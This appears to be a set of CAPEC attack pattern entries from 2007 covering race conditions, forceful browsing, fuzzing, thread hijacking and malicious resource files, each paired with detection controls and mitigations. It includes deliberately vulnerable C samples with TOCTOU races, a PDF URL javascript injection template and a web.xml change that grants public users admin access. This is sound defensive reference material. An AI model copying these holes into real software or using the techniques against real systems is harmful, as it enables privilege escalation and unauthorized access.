| Sean Barnum | Cigital, Inc. | 2007-03-25 | Identified priority for pattern creation |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Eric Dalci | Cigital, Inc. | 2007-03-25 | Fleshed out content for pattern | | Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revise |
|
| Attack Pattern ID | Pattern Abstraction: Standard 26 | | Typical Severity | High | | Description | Summary This attack targets a race condition occurring when multiple processes access and manipulate the same resource concurrently and the outcome of the execution depends on the particular order in which the access takes place. The attacker can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance a race condition can occur while accessing a file, the attacker can trick the system by replacing the original file with his version and cause the system to read the malicious file. Attack Execution Flow The attacker explores to gauge what level of access he has. The attacker gains access to a resource on the target host. The attacker modifies the targeted resource. The resource's value is used to determine the next normal execution action. The resource is modified/checked concurrently by multiple processes. By using one of the processes, the attacker is able to modify the value just before it is consumed by a different process. A race condition occurs and is exploited by the Attacker to abuse the target host.
| | Attack Prerequisites | A resource is accessed/modified concurrently by multiple processes such that a race condition exists. The attacker has the ability to modify the resource. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Time and State
- Modification of Resources
| | Examples-Instances | Description The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. Related Vulnerability Description The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name.
include <sys/types.h>
include <fcntl.h>
include <unistd.h>
define FILE "/tmp/myfile"
define UID 100
void test(char *str)
{
int fd;
fd = creat(FILE, 0644);
if(fd == -1)
return;
chown(FILE, UID, -1); /* BAD */
close(fd);
}
int main(int argc, char **argv)
{
char *userstr;
if(argc > 1) {
userstr = argv[1];
test(userstr);
}
return 0;
}
//Source : SAMATE.NIST.GOV : http://samate.nist.gov/SRD/view_testcase.php?login=Guest&;tID=1598 | | Attacker Skill or Knowledge Required | Medium/High | | Probing Techniques | Vulnerability testing tool can be used to probe for race condition. The attacker may also look for temporary file creation. The attacker may tries to replace them and take advantage of a race condition. | | Solutions and Mitigations | Use safe libraries to access resources such as files. Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition. Use synchronization to control the flow of execution. Use static analysis tools to find race conditions. Pay attention to concurrency problems related to the access of resources. | | Attack Motivation-Consequences | - Privilege Escalation
- Data Modification
| | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 368 | Context Switching Race Condition | Secondary | | 363 | Race Condition Enabling Link Following | Secondary | | 366 | Race Condition within a Thread | Secondary | | 370 | Race Condition in Checking for Certificate Revocation | Secondary | | 362 | Race Condition | Secondary | | 662 | Insufficient Synchronization | Targeted | | 689 | Permission Race Condition During Resource Copy | Targeted | | 667 | Insufficient Locking | Targeted | | 665 | Improper Initialization | Secondary |
| | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Low | High | Medium |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. CWE - Race Conditions Wikipedia, http://en.wikipedia.org/wiki/Race_condition David Wheeler - Prevent race conditions - http://www-128.ibm.com/developerworks/linux/library/l-sprace.html David Wheeler - Secure programming - http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/avoid-race.html | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eric Dalci | Cigital, Inc | 2007-01-25 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-07 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Name, Description, Attack Flow and Attack Prerequisites | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 87 | | Typical Severity | High | | Description | Summary An attacker employs forceful browsing to access portions of a website that are otherwise unreachable through direct URL entry.
Usually, a front controller or similar design pattern is employed to protect access to portions of a web application.
Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web appplication that have been improperly protected. Attack Execution Flow Explore Spider: Using an automated tool, an attacker follows all public links on a web site. He records all the links he finds. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Use a spidering tool to follow and record all links | env-Web | | Use a proxy tool to record all links visited during a manual traversal of the web application. | env-Web |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c87s1o1 | Success | A list of links is created by the attacker. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c87s1s1 | Detective | Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). | | c87s1s2 | Detective | Create links on some pages that are visually hidden from web browsers. Using IFRAMES, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. | | c87s1s3 | Preventative | Actively monitor the application and either deny or redirect requests from origins that appear to be automated. |
Experiment Attempt well known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. He records all the positive responses from the server. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Use a spidering tool to follow and record attempts on well known URLs | env-Web | | Use a proxy tool to record all links visited during a manual traversal of attempts on well known URLs. | env-Web |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c87s2i1 | Positive | Common resource identifiers are used (e.g., /admin/, admin.jsp, admin.aspx, etc.) | env-Web | | c87s2i2 | Positive | Well known middleware or application platforms are used (e.g., Cold Fusion, WebSphere, WebLogic, JBoss, etc.) | env-Web |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c87s3o1 | Success | The attacker discovers one or more unprotected resources. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c87s3s1 | Detective | Monitor errors (e.g., 404 not found) from web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on an unusual number of consecutive failures or total failures from a single host. Potentially alert on many failures from many different hosts, but in a relatively short time window. | | c87s3s2 | Detective | Create "honeypot" web pages or scripts that do not actually have any use in the application, and name them common names (e.g., admin.jsp, admin.do, admin.aspx, etc.). Alert when one of these resources is requested. | | c87s3s3 | Preventative | Actively monitor the application and either deny or redirect requests from origins that appear to be generating an unusual amount of failures. | | c87s3s4 | Corrective | Obtain a list of sensitive areas that should not be directly accessible (e.g., JSPs or other templates that should only be accessible via front controllers). Apply an external mechanism (rule in the load balancer, rule in the reverse proxy, etc.) to intercept and redirect requests for those resources. Ideally use patterns, not specific page names (e.g., /jsp/* instead of a list of individual JSPs). Regularly update the list that is used in operation. | | c87s3s5 | Detective | Identify defaults for platform-specific sensitive resources. If the application does not use those defaults, alert on all requests for them (e.g., http://server:8080/admin/) |
Exploit Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality. | Attack Step
Technique |
|---|
| Description | Environments |
|---|
| Access unprotected functions and execute them. | env-All |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c87s4s1 | Detective | Malformed log entries are a common side-effect of this kind of attack. E.g., "User xyz deleted by on 10/16/07." The "by on" indicates that no authorized user was recorded. (A good entry would say "user xyz deleted by admin on 10/16/07"). Monitoring of log file entries for correct and consistent output format can indicate this kind of attack succeeding. |
View unauthorized data: The attacker discovers and views unprotected sensitive data. | Attack Step
Technique |
|---|
| Description | Environments |
|---|
| Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.) | env-Web |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c87s5i1 | Positive | Dynamic pages (JSP, ASP, PHP, etc.) exist that divulge sensitive data without first checking authorization. | env-Web |
| | Attack Prerequisites | The forcibly browsable pages or accessible resources must be discoverable and improperly protected. | | Typical Likelihood of Exploit |
Very High
A number of automated crawlers as well as other tools are available that generally perform a good job at looking for forcefully browsable pages
| | Methods of Attack | | | Examples-Instances | Description A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.
An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform admnistrative functions without having to authenticate himself in that role. | | Attacker Skill or Knowledge Required | Low: Forcibly browsable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult | | Resources Required | A directory listing is helpful but not a requirement. No special resources are required. | | Probing Techniques | Following all the links recursively reveals resources that are available Having a directory listing also points to the available pages and resources in the application that may be forcibly browsable. | | Solutions and Mitigations | Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context. Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context. | | Attack Motivation-Consequences | - Information Leakage
- Privilege Escalation
| | Context Description | Forceful browsing is a consequence of improper access control. The application is designed with an assumption that resources are to be accessed in a certain sequence and that this sequence is immutable.
Pages in an application can request the client's identity each time a request is made or can rely on a controller or filter to do it for them before passing on the request.
Often times, however, when pages are modified or new pages are added to an application, the access control logic is not updated simultaneously. This opens up an avenue for attackers to bypass the authentication mechanism and access such pages directly.
Another cause is multiple access routes to the same resource, not all of which are equally well protected. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 425 | Direct Request ('Forced Browsing') | Targeted | | 285 | Improper Access Control (Authorization) | Secondary | | 693 | Protection Mechanism Failure | Targeted |
| | Related Vulnerabilities | | Vulnerability-ID | Vulnerability Description |
|---|
| CVE-2007-1156 | JBrowser allows remote attackers to bypass authentication and access certain administrative capabilities via a direct request for _admin/. | | CVE-2007-1062 | The Cisco Unified IP Conference Station 7935 3.2(15) and earlier, and Station 7936 3.3(12) and earlier does not properly handle administrator HTTP sessions, which allows remote attackers to bypass authentication controls via a direct URL request to the administrative HTTP interface for a limited time |
| | Related Security Principles | - Complete Mediation
- Reluctance To Trust
| | Related Guidelines | - Treat the Entire Inherited Process Context as Unvalidated Input
- Use Authentication Mechanisms, Where Appropriate, Correctly
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | | 2007-03-13 | First Draft |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revise | | Paco Hope | Cigital, Inc. | 2007-10-20 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 28 | | Typical Severity | Medium | | Description | Summary Fuzzing is a software testing method that feeds randomly constructed input to the system and looks for an indication that a failure in response to that input has occured. Fuzzing treats the system as a blackbox and is totally free from any preconceptions or assumptions about the system.
An attacker can leverage fuzzing to try to identify weaknesses in the system. For instance fuzzing can help an attacker discover certain assumptions made in the system about user input. Fuzzing gives an attacker a quick way of potentially uncovering some of these assumptions without really knowing anything about the internals of the system. These assumptions can then be turned against the system by specially crafting user input that may allow an attacker to achieve his goals. Attack Execution Flow Explore Observe communication and inputs: The fuzzing attacker observes the target system looking for inputs and communications between modules, subsystems, or systems. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Network sniffing. Using a network sniffer such as wireshark, the attacker observes communications into and out of the target system. | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the attacker observes the system calls and API calls that are made by the target system, and the nature of their parameters. | env-Local env-Embedded | | Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.) | env-Web |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c28s1o1 | Success | The attacker creates a list of unique communications packets, messages, inputs, API calls or other actions the software takes. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c28s1s1 | Detective | Alert on promiscuous mode. Some network devices (switches, hubs) or monitoring stations (e.g., IDS) can detect and alert when a station in the network is passively eavesdropping. | | c28s1s2 | Preventative | Some production hardware (for embedded environments) can have debugging disabled on the hardware. | | c28s1s3 | Preventative | Techniques exist to insert no-ops and other null branches that thwart basic attempts to execute software stepwise in a debugger. |
Experiment Generate fuzzed inputs: Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80). | env-All | | Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system. | env-Local env-Embedded |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c28s2s1 | Detective | Log unexpected parameters to API calls or system calls. | | c28s2s2 | Preventative | Profile the software's expected use of system calls. Use a sandboxing technique to restrict its API calls to the expected patterns. | | c28s2s3 | Preventative | SSL or other link-layer encryption techniques (VPN, 802.11x, etc.) can impair simple observation and require a would-be attacker to work much harder to get information about the operation of the software.. |
Observe the outcome: Observe the outputs to the inputs fed into the system by fuzzers and see if anything interesting happens. If failure occurs, determine why that happened. Figure out the underlying assumption that was invalidated by the input. | Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c28s3i1 | Positive | The software produces an indicator that the attacker can see (error message, altered error state in a protocol, etc.). | env-All | | c28s3i2 | Positive | The previous step led to plausible, practical fuzz inputs. | env-All |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c28s3o1 | Success | If the software's indicators (error messages, etc.) vary clearly based on the attacker's input, then the attacker has a sufficient starting point for customizing his attack. | | c28s3o2 | Failure | The attacker is unable to induce unexpected failures or output based fuzzed inputs. |
Exploit Craft exploit payloads: Put specially crafted input into the system that leverages the weakness identified through fuzzing and allows to achieve the goals of the attacker. Fuzzers often reveal ways to slip through the input validation filters and introduce unwanted data into the system. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Identify and embed shellcode for the target system. | env-All | | Embed higher level attack commands in the payload. (e.g., SQL, PHP, server-side includes, etc.) | env-Web env-CommProtocol env-Peer2Peer env-ClientServer | | Induce denial of service by exploiting resource leaks or bad error handling. | env-All |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c28s4s1 | Detective | Monitor system logs and alert on unusual activity. Most shellcode and unusual activity appears in logs. |
| | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Analysis
- Injection
- Brute Force
| | Examples-Instances | Description A fuzz test reveals that when data length for a particular field exceeds certain length, the input validation filter fails and lets the user data in unfiltered. This provides an attacker with an injection vector to deliver the malicious payload into the system. | | Attacker Skill or Knowledge Required | Low: There is a wide variety of fuzzing tools available. | | Resources Required | Fuzzing tools. | | Indicators-Warnings of Attack | A lot of invalid data is fed to the system. Data that cannot have been generated through a legitimate transaction/request. Data is coming into the system within a short period of time and potentially from the same IP. | | Obfuscation Techniques | Take pauses between fuzzing attempts (may not be very practical). Spoof IP addresses so that it does not look like all data is coming from the same source. | | Solutions and Mitigations | Test to ensure that the software behaves as per specification and that there are no unintended side effects. Ensure that no
assumptions about the validity of data are made. Use fuzz testing during the software QA process to uncover any surprises, uncover any assumptions or unexpected behavior. | | Attack Motivation-Consequences | - Data Modification
- Denial of Service
- Information Leakage
- Privilege Escalation
- Run Arbitrary Code
| | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 74 | Failure to Sanitize Data into a Different Plane (aka 'Injection') | Targeted | | 388 | Error Handling | Targeted | | 20 | Improper Input Validation | Targeted | | 728 | OWASP Top Ten 2004 Category A7 - Improper Error Handling | Secondary |
| | Purpose | Reconnaissance | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Medium | Medium | Medium |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eugene Lebanidze | Cigital, Inc | 2007-02-26 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-01 | Review and revision of content |
|
| Attack Pattern ID | Pattern Abstraction: Standard 29 | | Typical Severity | High | | Description | Summary This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. The typical example is the file access. The attacker can leverage a file access race condition by "running the race", meaning that he would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the attacker could do something such as replace the file and cause an escalation of privilege. Attack Execution Flow The attacker explores to gauge what level of access he has. The attacker confirms access to a resource on the target host. The attacker confirms ability to modify the targeted resource. The attacker decides to leverage the race condition by "running the race", meaning that he would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the attacker can replace the resource and cause an escalation of privilege.
| | Attack Prerequisites | A resource is access/modified concurrently by multiple processes. The attacker is able to modify resource. A race condition exists while accessing a resource. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Time and State
- Modification of Resources
| | Examples-Instances | Description The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. Related Vulnerability Description The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name.
include <sys/types.h>
include <fcntl.h>
include <unistd.h>
define FILE "/tmp/myfile"
define UID 100
void test(char *str)
{
int fd;
fd = creat(FILE, 0644);
if(fd == -1)
return;
chown(FILE, UID, -1); /* BAD */
close(fd);
}
int main(int argc, char **argv)
{
char *userstr;
if(argc > 1) {
userstr = argv[1];
test(userstr);
}
return 0;
}
//Source : SAMATE.NIST.GOV : http://samate.nist.gov/SRD/view_testcase.php?login=Guest&;tID=1598 | | Attacker Skill or Knowledge Required | Medium/High: This attack can get sophisticated since the attack has to occur within a short interval of time. | | Probing Techniques | Vulnerability testing tool can be used to probe for race condition. The attacker may also look for temporary file creation. The attacker may try to replace them and take advantage of a race condition. | | Solutions and Mitigations | Use safe libraries to access resources such as files. Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition. Use synchronization to control the flow of execution. Use static analysis tools to find race conditions. Pay attention to concurrency problems related to the access of resources. | | Attack Motivation-Consequences | - Data Modification
- Privilege Escalation
- Run Arbitrary Code
- Information Leakage
- Denial of Service
| | Context Description | The window of time between when a file property is checked and when the file is used can be exploited to launch a privilege escalation attack.
File access race conditions, known as time-of-check, time-of-use (TOCTOU) race conditions, occur when:
1. The program checks a property of a file, referencing the file by name.
2. The program later performs a filesystem operation using the same filename and assumes that the previously-checked property still holds.
Example: The following code is from a program installed setuid root. The program performs certain file operations on behalf of non-privileged users, and uses access checks to ensure that it does not use its root privileges to perform operations that should otherwise be unavailable to the current user. The program uses the access() system call to check if the person running the program has permission to access the specified file before it opens the file and performs the necessary operations.
if(!access(file,W_OK)) {
f = fopen(file,"w+");
operate(f);
...
}
else {
fprintf(stderr,"Unable to open file %s.\n",file);
}
The call to access()behaves as expected, and returns 0if the user running the program has the necessary permissions to write to the file, and -1 otherwise. However, because both access() and fopen() operate on filenames rather than on file handles, there is no guarantee that the file variable still refers to the same file on disk when it is passed to fopen() that it did when it was passed to access(). If an attacker replaces file after the call to access() with a symbolic link to a different file, the program will use its root privileges to operate on the file even if it is a file that the attacker would otherwise be unable to modify. By tricking the program into performing an operation that would otherwise be impermissible, the attacker has gained elevated privileges.
This type of vulnerability is not limited to programs with root privileges. If the application is capable of performing any operation that the attacker would not otherwise be allowed perform, then it is a possible target.
The window of vulnerability for such an attack is the period of time between when the property is tested and when the file is used. Even if the use immediately follows the check, modern operating systems offer no guarantee about the amount of code that will be executed before the process yields the CPU. Attackers have a variety of techniques for expanding the length of the window of opportunity in order to make exploits easier, but even with a small window, an exploit attempt can simply be repeated over and over until it is successful. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 367 | Time-of-check Time-of-use (TOCTOU) Race Condition | Targeted | | 368 | Context Switching Race Condition | Secondary | | 366 | Race Condition within a Thread | Secondary | | 370 | Race Condition in Checking for Certificate Revocation | Secondary | | 362 | Race Condition | Secondary | | 662 | Insufficient Synchronization | Targeted | | 691 | Insufficient Control Flow Management | Targeted | | 663 | Use of a Non-reentrant Function in an Unsynchronized Context | Targeted | | 665 | Improper Initialization | Secondary |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 26 | Leveraging Race Conditions | More Detailed | | | 27 | Leveraging Race Conditions via Symbolic Links | More Abstract | |
| | Related Security Principles | | | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | J. Viega and G. McGraw. Building Secure Software. Addison-Wesley, 2002. CWE - Input Validation | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eric Dalci | Cigital, Inc | 2007-01-25 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-07 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Name, Attack Flow, Attack Prerequisites and Related Attack Patterns | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 30 | | Typical Severity | Very High | | Description | Summary Attackers can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means.
Having done so, the Attacker may not only likely access functionality the system's designer didn't intend for them, but they may also go undetected or deny other users essential service in a catastrophic (or insidiously subtle) way. Attack Execution Flow Attacker determines the underlying system thread that is subject to user-control Attacker then provides input, perhaps by way of environment variables for the process in question, that affect the executing thread Upon successful hijacking, the attacker enjoys elevated privileges, and can possibly have the hijacked thread do his bidding
| | Attack Prerequisites | The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users In order to feasibly execute this class of attacks, the attacker must have the ability to hijack a privileged thread.
This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or providing malformed user-controllable input that causes the executing thread to fault and return to a higher privilege level or such.
This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute. | | Typical Likelihood of Exploit |
Low
| | Methods of Attack | - Analysis
- Modification of Resources
- API Abuse
| | Examples-Instances | Description Attacker targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread. The Attacker could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations. | | Attacker Skill or Knowledge Required | High: Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread. | | Resources Required | The attacker needs to be able to latch onto a privileged thread. No special hardware or software tool-based resources are required.
The Attacker does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the Attacker's malacious code. This is the case even if the attacker conducts the attack remotely. | | Probing Techniques | The attacker may attach a debugger to the executing process and observe the spawning and clean up of threads, as well as the switches in privilege levels The attacker can also observe the environment variables, if any, that affect executing threads and modify them in order to observe their effect on the execution. | | Solutions and Mitigations | Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code. Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope. | | Attack Motivation-Consequences | - Privilege Escalation
- Run Arbitrary Code
| | Context Description | This pattern applies to circumstances in which the Attacker knows the victim API and can compile, link, and deploy code in which the victim's privileged threads will call malicious code. This, in most circumstances, will involve being 'in process' with the victim. The pattern does, however, apply in network-based circumstances in which remote object/callback interaction is allowed through RPC-like technologies. In either case (local or remote) the Attacker must be able to gain control of the thread through 'normal' means, which may require privilege-enough to register a call back, subscribe to a service, or similar. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 270 | Privilege Context Switching Error | Secondary |
| | Relevant Security Requirements | Only those constructs within the application that cannot execute without elevated privileges must be granted additional privileges. Often times, the entire function or the entire process is granted privileges that are usually not necessary. The callee must ensure that additional privileges are shed before returning to the caller. This avoids pinning the responsibility on an inadvertant caller who may not have a clue about the innards of the callee. | | Related Security Principles | - Least Privilege
- Complete Mediation
| | Related Guidelines | - Minimize privileged code blocks
- Shed any privileges not required to execute at the earliest
- Treat the Entire Inherited Process Context as Unvalidated Input
| | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| John Steven | Cigital, Inc | 2007-02-10 | Initial core pattern content |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | Cigital, Inc | 2007-02-28 | Fleshed out pattern with extra content | | Sean Barnum | Cigital, Inc | 2007-03-07 | Review and revise |
|
| Attack Pattern ID | Pattern Abstraction: Standard 35 | | Typical Severity | Very High | | Description | Summary An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)
http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here
The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process.
The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality.
< security-constraint>
<description>
Security processing rules for admin screens</description>
<url-pattern>/admin/*</url-pattern>
<http-method>POST</http-method>
<http-method>GET</http-method>
<auth-constraint>
<role-name>administrator</role-name>
<role-name>public</role-name>
</auth-constraint>
</security-constraint>
The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control. | | Attack Prerequisites | The attacker must have the ability to modify nonexecutable files consumed by the target software. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Injection
- API Abuse
- Modification of Resources
| | Examples-Instances | Description Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerpint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix "cp" command can be rerouted to "rm" or other standard command so the user's intention is subverted. | | Attacker Skill or Knowledge Required | Low: to identify and execute against an overprivileged system interface | | Resources Required | Ability to communicate synchronously or asynchronously with server that publishes an overprivileged directory, program, or itnerface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP. | | Solutions and Mitigations | Design: Enforce principle of least privilege Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands. Implementation: Perform testing such as pentesting and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables. Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files. Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to execute. | | Attack Motivation-Consequences | - Run Arbitrary Code
- Data Modification
- Privilege Escalation
| | Context Description | "Attack Pattern: Leverage Executable Code in Nonexecutable Files
Attackers usually need to upload or otherwise inject hostile code into a target processing environment. In some cases, this code does not have to be inside an executable binary. A resource file, for example, may be loaded into a target process space. This resource file may contain graphics or other data and may not have been intended to be executed at all. But, if the attacker can insert some additional code sections into the resource, the process that does the loading may be none the wiser and may just load the new version. An attack can then occur."
[Hoglund and McGraw 04] | | Injection Vector | Nonexecutable files | | Payload | Executable code | | Activation Zone | Client machine and client network | | Payload Activation Impact | Enables attacker to execute server side code with any commands that the program owner has privileges to. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 94 | Failure to Control Generation of Code (aka 'Code Injection') | Targeted | | 96 | Insufficient Control of Directives in Statically Saved Code (Static Code Injection) | Targeted | | 95 | Insufficient Control of Directives in Dynamically Evaluated Code (aka 'Eval Injection') | Targeted | | 97 | Failure to Sanitize Server-Side Includes (SSI) Within a Web Page | Targeted | | 272 | Least Privilege Violation | Secondary | | 59 | Failure to Resolve Links Before File Access (aka 'Link Following') | Secondary | | 282 | Improper Ownership Management | Secondary | | 275 | Permission Issues | Secondary | | 264 | Permissions, Privileges, and Access Controls | Secondary | | 270 | Privilege Context Switching Error | Secondary | | 714 | OWASP Top Ten 2007 Category A3 - Malicious File Execution | Targeted |
| | Related Vulnerabilities | | Vulnerability-ID | Vulnerability Description |
|---|
|
Microsoft Security Bulletin MS04-028
|
Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution
|
